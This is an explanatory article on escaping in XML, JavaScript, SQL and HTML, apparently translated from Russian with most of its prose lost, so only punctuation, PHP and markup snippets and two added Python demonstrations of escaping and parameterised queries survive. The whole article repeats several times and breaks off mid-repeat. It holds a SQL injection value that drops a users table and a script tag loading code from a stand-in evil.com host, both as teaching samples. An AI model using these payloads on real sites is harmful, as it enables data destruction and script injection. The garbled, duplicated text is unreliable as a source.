, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post">
    <p class="meta">
        Posted by <?php echo $post['username']; ?>
        on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo $post['body']; ?>
    </p>
</div>
, , :
<div class="post">
    <p class="meta">
        Posted by Plato on January 2, 15:31
    </p>
    <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
    </p>
</div>
, , , , :
<div class="post">
    <p class="meta">
        Posted by Pascal on November 23, 04:12
    </p>
    <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    </p>
</div>
... . , , , ?
<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
    </p>
</div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
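Added example, not code from the original article: the escapers for the three contexts the article walks through (XML element content, a JavaScript string literal, HTML via htmlspecialchars) applied to the forum posts above, plus the nested case of a value inside a JS string inside an HTML attribute, where the escapes must be layered inside-out. The post data, the button template and every function name are constructed for this illustration; the HTML escaper mimics htmlspecialchars with ENT_QUOTES rather than calling PHP.

```python
import html
import json
import xml.etree.ElementTree as ET

# Constructed sample posts mirroring the article's forum scenario (not real data).
POSTS = [
    {"username": "Plato", "date": "January 2, 15:31",
     "body": 'I am said to have said "Lorem ipsum dolor sit amet".'},
    {"username": "Pascal", "date": "November 23, 04:12",
     "body": "Basic math tells us that if x < n and y > n, x cannot be larger than y."},
    {"username": "JackTR", "date": "July 18, 12:56",
     "body": '<script src="http://evil.com/dangerous.js"></script>'},
]


def escape_html(text):
    """Mimic of PHP htmlspecialchars() with ENT_QUOTES: the five characters that
    can open a tag or close an attribute become entities, so the browser shows
    them as text instead of parsing them as markup."""
    return (text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace('"', "&quot;").replace("'", "&#039;"))


def escape_js_string(text):
    """Escape a value for the inside of a double-quoted JavaScript string
    literal, as the article does by hand with \\" and \\\\.  The slash is
    escaped as well so that a "</script>" in the data cannot end the script
    element: the HTML parser draws a second string boundary around the JS one."""
    return (text.replace("\\", "\\\\").replace('"', '\\"').replace("/", "\\/")
                .replace("\n", "\\n").replace("\r", "\\r"))


def escape_xml_text(text):
    """Escape the characters XML reserves inside element content."""
    return text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


TEMPLATE = ('<div class="post"><p class="meta">Posted by {user} on {date}</p>'
            '<p class="body">{body}</p></div>')


def render_post_unsafe(post):
    """The article's first template: user data pasted straight into the HTML."""
    return TEMPLATE.format(user=post["username"], date=post["date"], body=post["body"])


def render_post(post):
    """The article's fixed template: every user-controlled value passes through
    the HTML escaper; the date is generated by the program and needs none."""
    return TEMPLATE.format(user=escape_html(post["username"]), date=post["date"],
                           body=escape_html(post["body"]))


def html_roundtrip(text):
    """What the HTML parser sees after escaping must be the original text."""
    return html.unescape(escape_html(text))


def render_quote_button(post):
    """Strings within strings: the body sits in a JS string literal, which sits
    in an HTML attribute.  Escape inside-out, JS first and then HTML, so that
    each parser (HTML, then JS) peels off exactly one layer."""
    js_literal = '"%s"' % escape_js_string(post["body"])
    return '<button onclick="alert(%s)">quote</button>' % escape_html(js_literal)


def quote_button_roundtrip(post):
    """Replay the two parsers: the HTML parser decodes the attribute value, the
    JS parser decodes the string literal (a JSON parser accepts the same
    escapes, so it stands in for the JS parser here)."""
    attr = render_quote_button(post).split('onclick="', 1)[1].split('">', 1)[0]
    js_call = html.unescape(attr)                 # alert("...")
    return json.loads(js_call[len("alert("):-1])  # the JS string literal


def build_article_xml(author, contents, escape=True):
    """The article's <article> document, with or without XML escaping."""
    if escape:
        author, contents = escape_xml_text(author), escape_xml_text(contents)
    return ('<?xml version="1.0" encoding="UTF-8" ?><article><author>%s</author>'
            '<contents>%s</contents></article>' % (author, contents))


def xml_contents(xml_text):
    """Parse the document and return the <contents> text, or None when it is not
    well-formed, which is what an unescaped "<" in the text produces."""
    try:
        return ET.fromstring(xml_text.encode("utf-8")).find("contents").text
    except ET.ParseError:
        return None


if __name__ == "__main__":
    for post in POSTS:
        print(render_post(post))
        print(render_quote_button(post))
    print(xml_contents(build_article_xml("Homo Sapiens", "x < n and y > n")))
```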
, . - :
$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
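Added example, not the article's code: the article's three inputs (Alex, Mc'Donalds, Joe'; DROP TABLE users; --) run through string concatenation, a Python mimic of mysql_real_escape_string, and the parameterised query the article recommends, against an in-memory SQLite database constructed here. The sample rows, phone numbers and function names are assumptions of this example; the escaping mimic follows MySQL's backslash rules and is not PHP's implementation.

```python
import sqlite3

# The three inputs the article walks through.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def build_query_concat(name):
    """The article's vulnerable pattern: the value is glued into the SQL text,
    so a quote inside it ends the literal and the rest is parsed as SQL."""
    return "SELECT phone_number FROM users WHERE name = '%s'" % name


def mysql_real_escape_string(value):
    """Python mimic (written for this example) of PHP's mysql_real_escape_string():
    backslash-escapes the characters MySQL treats specially in a quoted literal."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\n": "\\n",
             "\r": "\\r", "\x00": "\\0", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def build_query_escaped(name):
    """Escaping keeps the whole value inside the quotes.  The result is MySQL
    dialect: standard SQL (and SQLite) doubles the quote instead, so an escaper
    is only correct for the engine that will parse its output."""
    return "SELECT phone_number FROM users WHERE name = '%s'" % mysql_real_escape_string(name)


def fresh_db():
    """In-memory SQLite database with constructed sample rows (note the standard
    SQL doubling of the quote in Mc''Donalds)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (name TEXT, phone_number TEXT);"
        "INSERT INTO users VALUES ('Alex', '555-0100'), ('Mc''Donalds', '555-0199');")
    return conn


def table_exists(conn, table):
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                       (table,)).fetchone()
    return row is not None


def split_statements(sql):
    """Split a script into statements the way a permissive driver would, using
    SQLite's own completeness check so quotes and comments are respected.  An
    unterminated literal or a trailing '--' comment yields no statement."""
    stmts, buf = [], ""
    for piece in sql.split(";"):
        buf += piece + ";"
        if sqlite3.complete_statement(buf):
            stmts.append(buf)
            buf = ""
    return stmts


def run_concat(conn, name):
    """Run the concatenated query as a multi-statement driver would and report
    whether the users table survived."""
    for stmt in split_statements(build_query_concat(name)):
        conn.execute(stmt).fetchall()
    return table_exists(conn, "users")


def lookup_param(conn, name):
    """The article's prepared-statement form (PDO's ? placeholder): the SQL text
    is fixed, the value travels separately and is never parsed as SQL."""
    rows = conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    for name in INPUTS:
        print(build_query_concat(name))
        print(build_query_escaped(name))
        print("users table survives concatenation:", run_concat(fresh_db(), name))
        print("parameterised lookup:", lookup_param(fresh_db(), name))
```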
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
